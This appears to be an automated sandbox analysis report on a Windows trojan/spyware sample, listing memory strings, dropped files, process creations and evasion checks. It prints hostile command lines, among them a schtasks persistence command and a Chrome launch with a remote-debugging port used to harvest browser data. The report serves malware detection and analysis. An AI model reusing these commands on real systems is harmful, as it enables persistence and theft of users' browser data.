Source: chrome.exe, 00000004.00000002.2809718880.00005E10023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000004.00000002.2811316469.00005E1002830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2812090905.00005E1002A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 00000004.00000002.2810086849.00005E100251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000004.00000002.2809971002.00005E10024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2811787661.00005E1002944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2819161440.00005E10032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2810857792.00005E10026DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811520623.00005E10028CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2811787661.00005E1002944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2818301794.00005E1003080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2810857792.00005E10026DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811520623.00005E10028CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2811787661.00005E1002944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2818301794.00005E1003080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2810857792.00005E10026DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811520623.00005E10028CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000004.00000002.2809971002.00005E10024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2810941726.00005E1002710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2815088555.00005E1002F0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actionsUI
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000004.00000002.2809971002.00005E10024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2811189215.00005E10027D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2815088555.00005E1002F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2812150640.00005E1002A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2810941726.00005E1002710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2815088555.00005E1002F0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionsh
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000004.00000002.2810086849.00005E100251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000004.00000002.2810086849.00005E100251C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000004.00000003.2793915331.00005E10025A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000004.00000003.2783892032.00005E10026A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000004.00000002.2810196746.00005E1002570000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2784554689.00005E100285C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811550196.00005E10028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000004.00000002.2814055239.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2811357384.00005E1002858000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2793877812.00005E1002E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787690379.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000004.00000002.2811357384.00005E1002858000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000004.00000002.2814122917.00005E1002E38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000004.00000002.2814055239.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2793877812.00005E1002E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787690379.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000004.00000002.2814055239.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2793877812.00005E1002E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787690379.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtaba
Source: chrome.exe, 00000004.00000002.2814055239.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2793877812.00005E1002E28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2787690379.00005E1002E2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: ELLRGATenShKoyKeRtXA.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: chrome.exe, 00000004.00000003.2780711945.00005C1800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000004.00000003.2780455423.00005C180039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2780250962.00005C1800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2808419703.00005C180080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000004.00000003.2780711945.00005C1800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj
Source: chrome.exe, 00000004.00000002.2808251351.00005C180078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2780711945.00005C1800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000004.00000003.2780455423.00005C180039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2780250962.00005C1800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2808419703.00005C180080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000004.00000003.2780711945.00005C1800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2780711945.00005C1800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000004.00000003.2780711945.00005C1800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000004.00000002.2808251351.00005C180078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000004.00000003.2780455423.00005C180039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2780250962.00005C1800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2808419703.00005C180080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 00000004.00000002.2808735656.00005E100220C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2809718880.00005E10023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000004.00000002.2809718880.00005E10023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000004.00000002.2811357384.00005E1002858000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ip
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000004.00000002.2814396086.00005E1002EC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444preferSkippingInvalidateForEmulatedFormats
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000004.00000003.2786941811.00005E1002590000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5F9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_6C5F9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C5F9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 7_2_6C5F9E27

System Summary

Source: C:\Users\user\Desktop\PhwUGyok2i.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: PhwUGyok2i.exe Static PE information: section name:
Source: PhwUGyok2i.exe Static PE information: section name: .idata
Source: PhwUGyok2i.exe Static PE information: section name:
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6AADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B36E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B3560 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B5A70 appears 75 times
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 1148
Source: PhwUGyok2i.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: PhwUGyok2i.exe Static PE information: Section: kdafarva ZLIB complexity 0.9944718095694486
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@25/7@16/5
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5632
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.2811550196.00005E10028ED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: PhwUGyok2i.exe Virustotal: Detection: 53%
Source: PhwUGyok2i.exe ReversingLabs: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\PhwUGyok2i.exe "C:\Users\user\Desktop\PhwUGyok2i.exe"
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=1988,i,12239918215258673824,2474268141507560200,262144 /prefetch:8
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 1148
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=1988,i,12239918215258673824,2474268141507560200,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: PhwUGyok2i.exe Static file information: File size 4386304 > 1048576
Source: PhwUGyok2i.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: PhwUGyok2i.exe Static PE information: Raw size of kdafarva is bigger than: 0x100000 < 0x1a7e00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00168230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 7_2_00168230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: PhwUGyok2i.exe Static PE information: real checksum: 0x43a699 should be: 0x432cec
Source: PhwUGyok2i.exe Static PE information: section name:
Source: PhwUGyok2i.exe Static PE information: section name: .idata
Source: PhwUGyok2i.exe Static PE information: section name:
Source: PhwUGyok2i.exe Static PE information: section name: kdafarva
Source: PhwUGyok2i.exe Static PE information: section name: cefydpxz
Source: PhwUGyok2i.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Source: PhwUGyok2i.exe Static PE information: section name: kdafarva entropy: 7.955458272987732
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe

Boot Survival

Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\PhwUGyok2i.exe Window searched: window name: Filemonclass
